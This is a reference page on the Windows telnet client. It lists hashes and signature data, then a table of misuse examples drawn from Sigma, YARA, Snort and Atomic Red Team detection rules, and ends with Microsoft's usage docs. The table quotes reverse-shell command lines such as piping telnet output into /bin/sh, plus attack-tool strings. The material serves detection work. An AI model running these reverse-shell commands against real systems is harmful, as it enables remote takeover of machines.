telnet.exe
- File Path:
C:\Windows\system32\telnet.exe
- Description: Microsoft Telnet Client
Hashes
Type | Hash |
---|---|
MD5 | 8EAE1ADEF9BF1A17B152F31C79088A88 |
SHA1 | FE037BB6B345A866586A96D8E7A6EF6A23B4EF4D |
SHA256 | ABE72A168C332E2FCB493E85290744E7153ECD109A0B5FFD7FABBAAC339C673A |
SHA384 | 49A1D098853F737A530C026903CB8093BD72793C2EA13A73671892D488F13BBADD9C534BDE44B3AB8689AC59194CB232 |
SHA512 | 4165E51FB605D3CD5671B0C4AD282A9645B2AE2193D923819C6BE45AE9427AD628488CE5877A69CEAE5ADA4505201B23C30202EE15CBF0FDD8E0CC72E5D95B8F |
SSDEEP | 3072:fR4CNuFPMRjUJdxKPggRqYx7XoQEYvkWEnqq:J4CM1MRQJdxKPggRqW76sAnq |
Signature
- Status: Signature verified.
- Serial:
33000001C422B2F79B793DACB20000000001C4
- Thumbprint:
AE9C1AE54763822EEC42474983D8B635116C8452
- Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: telnetc.exe.mui
- Product Name: Microsoft Windows Operating System
- Company Name: Microsoft Corporation
- File Version: 10.0.17763.1 (WinBuild.160101.0800)
- Product Version: 10.0.17763.1
- Language: English (United States)
- Legal Copyright: Microsoft Corporation. All rights reserved.
Possible Misuse
The following table contains possible examples of telnet.exe
being misused. While telnet.exe
is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | lnx_auditd_network_service_scanning.yml | - '/telnet' |
DRL 1.0 |
sigma | lnx_apt_equationgroup_lnx.yml | - '/bin/telnet locip locport < /dev/console \| /bin/sh' |
DRL 1.0 |
sigma | lnx_apt_equationgroup_lnx.yml | - '&& telnet * 2>&1 </dev/console' |
DRL 1.0 |
sigma | lnx_shell_susp_rev_shells.yml | - ' \| /bin/bash \| telnet ' |
DRL 1.0 |
sigma | proc_creation_macos_network_service_scanning.yml | - '/telnet' |
DRL 1.0 |
sigma | proc_creation_lnx_network_service_scanning.yml | - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning |
DRL 1.0 |
sigma | image_load_uac_bypass_via_dism.yml | - Actions of a legitimate telnet client |
DRL 1.0 |
sigma | proc_creation_win_multiple_suspicious_cli.yml | - telnet.exe |
DRL 1.0 |
sigma | proc_creation_win_susp_plink_remote_forward.yml | Description: 'Command-line SSH, Telnet, and Rlogin client' |
DRL 1.0 |
malware-ioc | LinuxMooseETrules.txt | alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Linux/Moose Telnet CnC Beacon"; flow:established,to_server; dsize:40; content:"\|0e 00 00 00\|"; offset:4; depth:4; fast_pattern; content:!"\|00\|"; within:1; content:!"\|00\|"; distance:3; within:1; content:"\|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\|"; distance:4; within:28; content:!"\|00 00 00 00\|"; depth:4; reference:url,welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf; classtype:trojan-activity; sid:2021149; rev:1;) |
© ESET 2014-2018 |
malware-ioc | moose | leveraging weak or default usernames and passwords via the Telnet protocol. If |
© ESET 2014-2018 |
atomic-red-team | T1046.md | Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | telnet #{host} #{port} | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | ##### Description: Check if telnet command exists on the machine | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | if [ -x “$(command -v telnet)” ]; then exit 0; else exit 1; fi; | MIT License. © 2018 Red Canary |
atomic-red-team | T1046.md | (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.001.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.003.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1110.004.md | * Telnet (23/TCP) | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | Testing uncommonly used port utilizing telnet. | MIT License. © 2018 Red Canary |
atomic-red-team | T1571.md | telnet #{domain} #{port} | MIT License. © 2018 Red Canary |
signature-base | apt_eqgrp.yar | $x5 = “-p DEST_PORT, –dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp.yar | description = “EQGRP Toolset Firewall - from files ssh.py, telnet.py” | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $s2 = “Cut and paste the following to the telnet prompt:” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | description = “Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh” | CC BY-NC 4.0 |
signature-base | apt_eqgrp_apr17.yar | $x2 = “Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh"” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_fvey_shadowbroker_dec16.yar | $s5 = “bll.telnet” fullword ascii | CC BY-NC 4.0 |
signature-base | apt_fvey_shadowbroker_dec16.yar | $s1 = “/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet” ascii | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | $s1 = “SSH, Telnet and Rlogin client” fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | description = “Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME” | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s0 = “TELNET [host [port]]” fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s2 = “TELNET.EXE” fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | $s14 = “Software\Microsoft\Telnet” fullword wide | CC BY-NC 4.0 |
signature-base | thor-hacktools.yar | description = “Detects malicious telnet shell” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | description = “Semi-Auto-generated - file telnet.pl.txt” | CC BY-NC 4.0 |
signature-base | thor-webshells.yar | description = “Semi-Auto-generated - file telnet.cgi.txt” | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
telnet
Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Communicates with a computer running the telnet server service. Running this command without any parameters, lets you enter the telnet context, as indicated by the telnet prompt (Microsoft telnet>). From the telnet prompt, you can use telnet commands to manage the computer running the telnet client.
[!IMPORTANT] You must install the telnet client software before you can run this command. For more information, see Installing telnet.
Syntax
telnet [/a] [/e <escapechar>] [/f <filename>] [/l <username>] [/t {vt100 | vt52 | ansi | vtnt}] [<host> [<port>]] [/?]
Parameters
Parameter | Description |
---|---|
/a | Attempts automatic logon. Same as /l option, except that it uses the currently logged on user’s name. |
/e <escapechar> |
Specifies the escape character used to enter the telnet client prompt. |
/f <filename> |
Specifies the file name used for client side logging. |
/l <username> |
Specifies the user name to log on with on the remote computer. |
/t {vt100 | vt52 | ansi | vtnt} |
Specifies the terminal type. Supported terminal types are vt100, vt52, ansi, and vtnt. |
<host> [<port>] |
Specifies the hostname or IP address of the remote computer to connect to, and optionally the TCP port to use (default is TCP port 23). |
/? | Displays help at the command prompt. |
Examples
To use telnet to connect to the computer running the telnet Server Service at telnet.microsoft.com, type:
telnet telnet.microsoft.com
To use telnet to connect to the computer running the telnet Server Service at telnet.microsoft.com on TCP port 44 and ro log the session activity in a local file called telnetlog.txt, type:
telnet /f telnetlog.txt telnet.microsoft.com 44
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.